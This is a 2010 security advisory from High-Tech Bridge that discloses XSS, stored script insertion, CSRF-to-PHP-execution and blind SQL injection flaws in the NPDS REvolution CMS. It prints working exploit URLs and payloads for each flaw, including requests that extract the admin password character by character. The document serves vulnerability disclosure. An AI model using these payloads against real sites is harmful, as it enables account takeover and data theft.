Multiple Vulnerabilities in NPDS REvolution

2010-04-29T00:00:00
ID HTB22363
Type htbridge
Reporter High-Tech Bridge
Modified 2010-04-29T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in NPDS REvolution which could be exploited to perform cross-site scripting (XSS), script insertion and CSRF attacks and execute arbitrary SQL commands in application`s database.

1) Cross-site scripting vulnerabilities in NPDS REvolution
1.1 The vulnerability exists due to input sanitation error in the "topic" parameter in /viewtopic.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://host/viewtopic.php?topic=3"><script>alert(document.cookie)</script>&f orum=1

1.2 The vulnerability exists due to input sanitation error in the "did" parameter in /download.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://host/download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=aler t%28document.cookie%29%3E

2) Script insertion vulnerability in NPDS REvolution
An input sanitation error exists in the "theme" parameter in /stats.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when the user views the malicious data.
Exploitation example:

For exploitation the following steps are required:
1. Visit the page http://host/user.php?op=chgtheme
2. Change the "theme" hidden field to the following value:
<script>alert(document.cookie)</script>
3. Submit the form.
4. Visit the http://host/stats.php page to see the code being executed.

3) Cross-site request forgery (CSRF) in NPDS REvolution
The vulnerability exists due to insufficient validation of the request origin in the "/admin.php" script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and execute arbitrary PHP code on the target system with privileges of the webserver.
Exploitation example:
<img src="http://host/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=f ooter_after&confirm=1">

4) SQL injection vulnerability in NPDS REvolution
The vulnerability exists due to input sanitation error in the "sortby" parameter in /download.php. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation examples:
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20autho rs+where+aid=char%2897,100,109,105, 110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC--
http://host/download. php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%289 7,100,109,105, 110%29+and+substr%28pwd,1,1%29=char%2849%29%29+DESC--
...
http://host/down load.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=cha r%2897,100,109,105, 110%29+and+substr%28pwd,1,1%29=char%2884%29%29+DESC--
....
http://host/dow nload.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=ch ar%2897,100,109,105, 110%29+and+substr%28pwd,2,1%29=char%2848%29%29+DESC--
...
http://host/down load.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=cha r%2897,100,109,105, 110%29+and+substr%28pwd,2,1%29=char%28101%29%29+DESC--
...
http://host/dow nload.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=ch ar%2897,100,109,105, 110%29+and+substr%28pwd,3,1%29=char%2852%29%29+DESC--
...